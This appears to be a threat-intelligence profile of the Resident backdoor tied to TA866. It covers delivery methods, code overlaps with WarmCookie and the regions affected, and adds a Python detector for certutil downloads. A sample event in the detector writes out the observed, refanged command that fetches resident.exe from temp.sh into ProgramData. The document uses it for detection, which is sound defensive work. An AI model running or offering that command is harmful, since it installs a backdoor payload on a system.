Resident
Resident is a backdoor malware family associated with TA866 (also known as Asylum Ambuscade). Cisco Talos reporting describes it as a backdoor used in limited post-compromise cases to download and execute additional payloads on victim systems. TA866 activity linked to Resident has been observed following initial access via malspam and malvertising, including campaigns using email thread hijacking, malicious hyperlinks, attached PDF or Microsoft Publisher files, malicious Google ads, SEO poisoning, and 404 TDS infrastructure. In one observed case, TA866 used certutil to retrieve the Resident backdoor from hxxps://temp[.]sh/esuJB/resident[.]exe and save it as C:\programdata\res.exe. Talos also noted that TA866 frequently used file-hosting services such as temp[.]sh for payload delivery.
Resident is linked by Cisco Talos to the same threat actor assessed to have developed WarmCookie/BadSpace. Reported overlaps between Resident and WarmCookie include identical RC4 decryption implementations, similar mutex management using GUID-like mutex strings, and similar persistence mechanisms, indicating likely shared authorship associated with TA866.
Resident has been observed in intrusion activity affecting victims primarily in the United States, with additional cases in Canada, the United Kingdom, Germany, Italy, Austria, and the Netherlands. The most affected sector reported for TA866 follow-on payload cases was manufacturing, followed by government and financial services.
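As an added detection example (not code from Cisco Talos or Mallory), the following flags the certutil download-and-drop behaviour described above over Sysmon-style process-creation events. The event field names and the sample events are assumptions; the first sample mirrors the observed command with the URL refanged, the others are constructed for contrast.

```python
import re

# Hosts the reporting names as file-hosting services used for payload delivery.
DELIVERY_HOSTS = {"temp.sh"}

URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)
FETCH_FLAGS = ("-urlcache", "/urlcache", "-verifyctl", "/verifyctl")
DROP_DIR_RE = re.compile(r"\\programdata\\", re.IGNORECASE)


def detect_certutil_download(events):
    """Return one finding per event where certutil.exe fetches a remote URL.
    Severity rises when the host is a known delivery host or the output
    is written under C:\\ProgramData, as in the observed case."""
    findings = []
    for ev in events:
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        if not image.endswith("\\certutil.exe"):
            continue
        match = URL_RE.search(cmd)
        if match is None or not any(f in cmd.lower() for f in FETCH_FLAGS):
            continue  # local hash/cert operations carry no remote fetch
        host = match.group(1).lower()
        score, reasons = 1, ["certutil used to fetch a URL"]
        if host in DELIVERY_HOSTS:
            score += 2
            reasons.append(f"known delivery host {host}")
        if DROP_DIR_RE.search(cmd):
            score += 1
            reasons.append("output written under ProgramData")
        findings.append({"host": host, "reasons": reasons, "event": ev,
                         "severity": "high" if score >= 3 else "medium"})
    return findings


# Constructed sample events (assumed Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f "
                    r"https://temp.sh/esuJB/resident.exe C:\programdata\res.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\tools\agent.exe SHA256"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f "
                    r"https://updates.example.com/agent.msi C:\Users\bob\agent.msi"},
]

if __name__ == "__main__":
    for finding in detect_certutil_download(SAMPLE_EVENTS):
        print(finding["severity"], finding["host"], "; ".join(finding["reasons"]))
```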
Groups observed using it
1 distinct threat actor attributed by public researchers.
As described in prior reporting, Resident is a backdoor that can be used to download and execute additional payloads on victim systems.
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
3 sources tracked across advisories, community write-ups, and news.
A backdoor malware family that shares notable code/function-level similarities with WarmCookie (e.g., RC4 implementation, mutex management, persistence mechanisms), suggesting shared development lineage.
Resident is a backdoor malware family noted here for code and functional similarities with WarmCookie, including RC4 implementation, mutex handling, startup logic, and persistence via scheduled tasks.
Resident is a persistent backdoor associated with TA866 intrusions that enables download and execution of additional payloads on victim systems.